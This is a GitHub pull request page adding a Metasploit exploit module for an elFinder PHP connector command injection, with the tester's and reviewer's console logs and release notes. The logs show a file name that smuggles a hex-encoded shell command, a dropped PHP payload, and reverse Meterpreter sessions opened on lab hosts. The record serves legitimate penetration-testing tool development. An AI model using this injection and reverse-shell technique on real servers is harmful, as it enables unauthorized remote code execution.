Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add elFinder PHP Connector exiftran Command Injection #11545

Merged
merged 3 commits into from Mar 11, 2019

Conversation

Projects
None yet
2 participants
@bcoles
Copy link
Contributor

bcoles commented Mar 9, 2019

Add elFinder PHP Connector exiftran Command Injection exploit module. Fixes #11539

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
rhosts => 172.16.191.253
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
verbose => true
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
[*] 172.16.191.253:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
[*] Sending stage (38247 bytes) to 172.16.191.253
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
[!] Tried to delete .kPUXqhMZ.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > 

@bcoles bcoles added module docs labels Mar 9, 2019

@space-r7 space-r7 self-assigned this Mar 11, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 11, 2019

Tested v2.1.47 on Ubuntu:

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.215.167
rhosts => 172.16.215.167
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Uploading payload 'foK272.jpg;echo 6370202e2e2f66696c65732f666f4b3237322e6a70672a6563686f2a202e33486c323733722e706870 |xxd -r -p |sh& #.jpg' (1853 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.3Hl273r.php) ...
[*] Sending stage (38247 bytes) to 172.16.215.167
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.167:57360) at 2019-03-11 12:28:41 -0500
[!] Tried to delete .3Hl273r.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64
Meterpreter : php/linux

Code looks good to me, so I can land this soon.

@space-r7 space-r7 merged commit 6d14a53 into rapid7:master Mar 11, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request Mar 11, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 11, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 11, 2019

Release Notes

This adds a module that exploits a command injection vulnerability in elFinder versions < 2.1.48. elFinder allows for resizing and rotating images by passing the image file data, including unsanitized file names to the exiftran utility. Code execution can be achieved when performing an image operation on a file whose name contains shell commands.

@bcoles bcoles deleted the bcoles:elfinder_php_connector_exiftran_cmd_injection branch Mar 11, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.